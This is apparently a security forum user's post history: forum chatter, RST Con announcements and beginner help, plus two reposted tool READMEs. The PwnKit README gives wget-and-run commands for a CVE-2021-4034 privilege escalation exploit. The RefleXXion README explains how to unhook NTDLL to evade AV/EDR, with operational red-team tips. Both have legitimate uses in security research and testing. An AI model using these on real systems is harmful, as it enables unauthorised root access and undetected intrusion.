Posts: 18719
Joined
Last visited
Days Won: 701

Everything posted by Nytro
-
The thing is, RST isn't the only forum that barely works anymore. No forum works anymore. And I'm not only referring to IT ones, forums of any kind. One of the "problems" is precisely these (in my opinion) crappy Facebook groups. They're easy to access and everyone gives their opinion, only the opinions are often idiotic (e.g. car groups). Besides, it's chaos, there's no organization, posts are thrown in a heap without any sense and are hard to follow. We have a Facebook page but we don't use it because it doesn't help much. I'd like people to go back to forums, I like them a lot and I quickly find what I need (e.g. Softpedia). Then there are those WhatsApp, Telegram or Discord groups where the story is the same. If you have a question, everything depends on "who happens to be around". On a forum, practically all posts can be seen later too. More precisely, I can't figure out what we could do, since we can't change mentalities. We do our job and we're on the barricades. RST Con #2 is an idea through which I want to bring activity back to the forum. So, is anyone interested in a presentation? In creating CTF exercises?
-
Nice, I didn't know all of them!
-
Is there any way to get past the BIOS supervisor password?
Nytro replied to grandson's topic in Beginner discussions
See the first method and don't look at the others: https://www.cocosenor.com/articles/computer/3-ways-to-unlock-bios-password-on-lenovo-thinkpad-laptop.html Search for "Thinkpad l540 bios password" and you'll find other ideas too, but there's no guarantee that anything (simple) will work.
-
Is there any way to get past the BIOS supervisor password?
Nytro replied to grandson's topic in Beginner discussions
For certain models it used to work to generate a password from the error code. But it depends from model to model. There's a fairly high chance that nothing will work. What's the order in the boot menu?
-
Download the PDF, Introduction to Penetration Testing, it should be OK for a start.
-
Ah, yes, you mentioned it. Yes, it's fine, you have nothing to worry about.
-
Hi, it's not possible, just don't download something from it and run it on your machine. There were some possible attacks, just make sure you have the latest version of the RDP client (I assume it's the Microsoft one, it's OK).
-
An online proxy, if that's enough. https://hide.me/en/proxy and a lot of others. But you can't do much. Solutions exist in theory, but they assume you still go through that proxy.
-
Clearly, there's no point getting involved in such things. As for the "unorthodox" things people do, the technical part is probably not always what leads to them. I mean, it's useless to hide in 30 ways while, for example, you scam someone into sending money to your bank account. I don't really understand you, I don't see you with a Lamborghini in 1-2 years so you could say the risk was worth it, you get yourselves into crap without knowing it and without it even being worth it.
-
If that proxy is the only "opening" to the Internet, there's not really any way to get around it: Does no website work for you? Or are certain sites blocked? Do you have internal connections accessible?
-
Problem: The user profile service failed the log on
Nytro replied to CyberS's topic in Beginner discussions
I haven't run into this, but it seems to be fairly common and there are public solutions, including https://www.kapilarya.com/the-user-profile-service-failed-the-sign-in-windows-10 and probably many others. Try, and if it doesn't work, the simplest solution would be a reinstall.
-
Welcome back, you're on the right track.
-
Hi, it may not work. If traffic to the Internet is open ONLY through that proxy, you probably can't get around it. But what you can try to do (I don't know if it works) is to make a tunnel through that proxy. HTTP tunneling. Most likely a VPN on port 443 wouldn't work, but you can try.
-
How is it possible for an antivirus to scan your UEFI?
Nytro replied to grandson's topic in Beginner discussions
As far as I remember, there are processor-level instructions that allow certain operations on the BIOS, such as reading and possibly writing some settings. I don't think rewriting the code is possible, because I expect any modern BIOS to accept only signed firmware. The bootkit doesn't overwrite anything related to the BIOS, but rather what happens at boot. More precisely, after the BIOS does a few hardware checks, it will execute the instructions available at a certain address where the operating system's bootloader is usually located. A bootkit will overwrite that area with something else, and an antivirus can scan that memory area to check that everything is in order. Probably the scanning rules are based both on bootkit signatures and on signature checks (bootloader signed).
-
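The reply above describes a scanner checking the boot area for a bootkit. As an added example (not from the post, and not from any antivirus product), here is a minimal boot-sector integrity check in Python: it verifies the legacy MBR boot signature and compares a hash of the bootstrap code against a baseline recorded earlier from a trusted image, which is the simplest form of the "is everything still in order" check the post mentions. The sector layout constants, the baseline and all sample bytes are constructed assumptions; a scanner on a UEFI system would additionally verify the signed bootloader, which is not shown here.

```python
"""Added example (not from the forum post): a minimal boot-sector integrity
check of the kind a scanner might do on the first sector of a disk.

Assumptions (all constructed for this example):
- the sector is a 512-byte legacy MBR image: 440 bytes of boot code, a
  4-byte disk signature, 2 reserved bytes, a 64-byte partition table and
  the 0x55 0xAA boot signature at offset 510;
- the "known good" hash is a baseline recorded earlier from a trusted image.
"""
import hashlib

SECTOR_SIZE = 512
BOOT_CODE_LEN = 440          # bytes 0..439 hold the bootstrap code
BOOT_SIG_OFFSET = 510        # bytes 510..511 must be 0x55 0xAA


def make_sector(boot_code: bytes) -> bytes:
    """Build a constructed 512-byte MBR-style sector around the given boot code."""
    code = boot_code[:BOOT_CODE_LEN].ljust(BOOT_CODE_LEN, b"\x00")
    disk_sig = b"\x11\x22\x33\x44"     # constructed disk signature
    reserved = b"\x00\x00"
    partitions = b"\x00" * 64          # empty partition table, enough for the example
    return code + disk_sig + reserved + partitions + b"\x55\xAA"


def boot_code_hash(sector: bytes) -> str:
    """SHA-256 of only the executable part of the sector (the part a bootkit replaces)."""
    return hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest()


def check_boot_sector(sector: bytes, baseline_hash: str) -> dict:
    """Return findings: signature validity and whether the boot code matches the baseline."""
    findings = {"valid_signature": False, "matches_baseline": False, "verdict": "unknown"}
    if len(sector) != SECTOR_SIZE:
        findings["verdict"] = "malformed sector"
        return findings
    findings["valid_signature"] = sector[BOOT_SIG_OFFSET:] == b"\x55\xAA"
    findings["matches_baseline"] = boot_code_hash(sector) == baseline_hash
    if not findings["valid_signature"]:
        findings["verdict"] = "not a bootable sector"
    elif findings["matches_baseline"]:
        findings["verdict"] = "clean"
    else:
        findings["verdict"] = "boot code modified since baseline"
    return findings


# Constructed sample data: a "known good" sector and one whose boot code was altered.
GOOD_SECTOR = make_sector(b"\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * 100)
BASELINE_HASH = boot_code_hash(GOOD_SECTOR)
# Same partition table and boot signature, but different bootstrap code.
TAMPERED_SECTOR = make_sector(b"\xEB\x58\x90" + b"\xCC" * 100)

if __name__ == "__main__":
    for name, sec in (("good", GOOD_SECTOR), ("tampered", TAMPERED_SECTOR)):
        print(name, check_boot_sector(sec, BASELINE_HASH)["verdict"])
```

The check deliberately hashes only the bootstrap code, not the whole sector: the disk signature and partition table legitimately change when partitions are edited, so hashing them too would produce false alarms and hide the one change that matters.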
Events:
LinkedIn: https://www.linkedin.com/events/rstcon-26894664423269556224/about/
Facebook: https://www.facebook.com/events/312925840851762/
Registration (Zoom):
- Day one (March 17): https://us02web.zoom.us/webinar/register/7716432416217/WN_ihd6n-QbT9SmhUFEEiOouw
- Day two (March 18): https://us02web.zoom.us/webinar/register/8216433285169/WN_FvmdS_d2SJSo-OJpFaNRMA
-
I've published the necessary information (almost complete) on the site: https://rstcon.com/ We're waiting for:
1. Proposals for presentations (Call for Papers)
2. Donations for the CTF contest prizes
3. Exercises for the CTF contest
If anyone can help us, I'm waiting for a private message or an email at contact@rstcon.com
-
What format does that stick have? Is it USB 3.0? Is the port USB 2.0? If you use it normally, are there problems with it? PS: I have no idea what the problem is, I've also had a lot of problems with USB sticks over the years.
-
You can use an <input> with an "id" to read that number:

    <input type="text" id="nr">
    <button onclick="calculeaza()">Calculeaza</button>

And to display them you can use a div:

    <div id="afisare"></div>
    <script>
    function calculeaza() {
        var nr = parseInt(document.getElementById("nr").value, 10); // read the number from the input
        var suma = 0; // to compute it
        var afisare = document.getElementById("afisare");
        afisare.innerHTML = ""; // clear any previous output
        for (var i = 0; i < nr; i++) {
            suma += i;
            afisare.innerHTML = afisare.innerHTML + i + "<br>";
        }
        afisare.innerHTML = afisare.innerHTML + "Suma: " + suma;
    }
    </script>

Something like that as an idea, there are probably problems in what I wrote.
-
Correct. Some also suggest stored procedures, but don't follow them.
-
For now I've opened the registrations: The event will take place using the Zoom platform. For registration please use the following:
- Day one (March 17): https://us02web.zoom.us/webinar/register/7716432416217/WN_ihd6n-QbT9SmhUFEEiOouw
- Day two (March 18): https://us02web.zoom.us/webinar/register/8216433285169/WN_FvmdS_d2SJSo-OJpFaNRMA
I'll come back with detailed info regarding the call for papers and the CTF, on the site too. We're waiting for presentation proposals. I think it's an ideal opportunity: online, the requirements aren't (for now) very strict...
-
I'll come back with more details soon; if there are people who can help us (challenges or donations), I'm waiting for a PM.
-
Good question: 50 minutes. It doesn't have to be exact, each presentation has 60 minutes allocated including questions. Just don't let it run too short, 20-30 minutes for example, because we'd be stuck on break for too long. I'll come back soon with more details, I keep doing tests with Zoom, I tried Zoom Events which looks fancy and is kind of crap, so I think we'll stick with the webinar.
-
PwnKit
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Usage
Should work out of the box on Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

    wget https://github.com/ly4k/PwnKit/raw/main/PwnKit
    chmod +x ./PwnKit
    ./PwnKit

Example

Technical Details
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

References
https://github.com/arthepsy/CVE-2021-4034/

Source: https://github.com/ly4k/PwnKit
-
-
Introduction
RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks, it first collects the syscall numbers of the NtOpenFile, NtCreateSection, NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array. After that, there are two techniques that the user can choose to bypass the user-mode hooks.

Technique-1 reads the NTDLL as a file from C:\Windows\System32\ntdll.dll. After parsing, the .TEXT section of the already loaded NTDLL (where the hooks are performed) in memory is replaced with the .TEXT section of the clean NTDLL.

In Technique-2, NTDLL is read as a Section from KnownDlls, \KnownDlls\ntdll.dll (because DLL files are cached in KnownDlls as Sections). After parsing, the .TEXT section of the already loaded NTDLL (where the hooks are performed) in memory is replaced with the .TEXT section of the clean NTDLL.

The detailed flow of the methodology and all techniques is given below.

How to Use
You can open and compile the project with Visual Studio. The whole project supports the x64 architecture for both Debug and Release modes.

The RefleXXion-EXE solution generates the EXE for PoC purposes. If you want to understand how the project works step by step, it will make your job easier. The main function contains the Technique1 and Technique2 function definitions. Comment one of them out and compile. Do not use both functions at the same time.

The RefleXXion-DLL solution generates the DLL that you inject into the process you want to bypass the user-mode hooks for NTDLL. At the beginning of the main.cpp file, there are definitions of which technique to use. You can choose one of them and compile it. Do not set all values at the same time, set only the one technique you want. An example configuration is given below.

    // Techniques configuration section
    #define FROM_DISK 1 // If you set it to 1, the Technique-1 will be used. For more information; https://github.com/hlldz/RefleXXion
    #define FROM_KNOWNDLLS 0 // If you set it to 1, the Technique-2 will be used. For more information; https://github.com/hlldz/RefleXXion

Operational Usage Notes & OPSEC Concerns
- RefleXXion currently only supports the x64 architecture.
- RefleXXion only unhooks NTDLL functions; you may need to unhook other DLLs (kernel32.dll, advapi32.dll etc.) as well. For this, you can easily edit the necessary places in the project.
- RefleXXion only uses an RWX memory region when the overwriting of the .TEXT section starts. For this process a new memory region is not created; the existing memory region (the .TEXT section of the NTDLL that is already loaded) is made RWX and then converted back to RX.

    ULONG oldProtection;
    ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &oldProtection);
    memcpy()...
    ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, oldProtection, &oldProtection);

  P.S. RefleXXion invokes the NtProtectVirtualMemory API over the cleanly installed NTDLL. It uses the CustomGetProcAddress function for this because the clean NTDLL is not in the InLoadOrderModuleList even though it is loaded into memory. So a solution like the one here (https://stackoverflow.com/questions/6734095/how-to-get-module-handle-from-func-ptr-in-win32) will not work. That's why the custom GetProcAddress function exists and is used.
- You can load the RefleXXion DLL from disk into the target process. You may not prefer a run like this for sensitive work such as a Red Team operation. Therefore, you can convert the RefleXXion DLL to shellcode using the sRDI project or integrate the RefleXXion code into your own loader or project.
- Even if NTDLL (as file or as section) is reloaded into the injected process, it does not remain loaded. RefleXXion closes all opened handles (file & section handles) for its own processes.

Special Thanks & Credits
- Research & PoC for collecting clean system calls with LdrpThunkSignature by Peter Winter-Smith, @peterwintrsmith. EDR Parallel-asis through Analysis, https://www.mdsec.co.uk/2022/01/edr-parallel-asis-through-analysis/
- Windows 10 Parallel Loading Breakdown by Jeffrey Tang. https://blogs.blackberry.com/en/2017/10/windows-10-parallel-loading-breakdown and https://stackoverflow.com/questions/42789199/why-there-are-three-unexpected-worker-threads-when-a-win32-console-application-s
- Shellycoat by Upayan, @slaeryan. https://github.com/slaeryan/AQUARMOURY/tree/master/Shellycoat

Source: https://github.com/hlldz/RefleXXion